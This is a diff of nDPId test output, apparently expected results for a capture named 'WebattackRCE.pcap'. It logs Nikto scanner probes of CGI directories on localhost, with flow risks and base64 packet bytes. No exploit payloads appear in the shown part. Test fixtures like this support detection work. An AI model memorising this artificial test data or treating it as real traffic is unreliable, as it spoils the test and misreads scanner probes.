-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276719,"pkt":"AAAAAAAAAAAAAAAACABFAADEZD1AAEAG1\/R\/AAABfwAAAcHYH5Ba2lwhPKb01YAYAED+uAAAAQEICp1m+xedZvsXR0VUIC9zY3JpcHRzLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276721,"pkt":"AAAAAAAAAAAAAAAACABFAADEcYRAAEAGyq1\/AAABfwAAAcHaH5DTlEmfv44DhoAYAED+uAAAAQEICp1m+xmdZvsZR0VUIC9jZ2ktd2luLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276722,"pkt":"AAAAAAAAAAAAAAAACABFAADF6C5AAEAGVAJ\/AAABfwAAAcHcH5DviNAxcnIUCYAYAED+uQAAAQEICp1m+xqdZvsaR0VUIC9mY2dpLWJpbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276724,"pkt":"AAAAAAAAAAAAAAAACABFAADEjEdAAEAGr+p\/AAABfwAAAcHeH5D1xLRZpE\/AW4AYAED+uAAAAQEICp1m+xydZvscR0VUIC9jZ2ktZXhlLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276725,"pkt":"AAAAAAAAAAAAAAAACABFAADFFmlAAEAGJch\/AAABfwAAAcHgH5D+Si57PKwG0oAYAED+uQAAAQEICp1m+x2dZvsdR0VUIC9jZ2ktaG9tZS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276727,"pkt":"AAAAAAAAAAAAAAAACABFAADFtaJAAEAGho5\/AAABfwAAAcHiH5DFGI2++SyH14AYAED+uQAAAQEICp1m+x+dZvsfR0VUIC9jZ2ktcGVybC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276728,"pkt":"AAAAAAAAAAAAAAAACABFAADFuPZAAEAGgzp\/AAABfwAAAcHkH5CSdoDrZ1cRi4AYAED+uQAAAQEICp1m+yCdZvsgR0VUIC9zY2dpLWJpbi8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
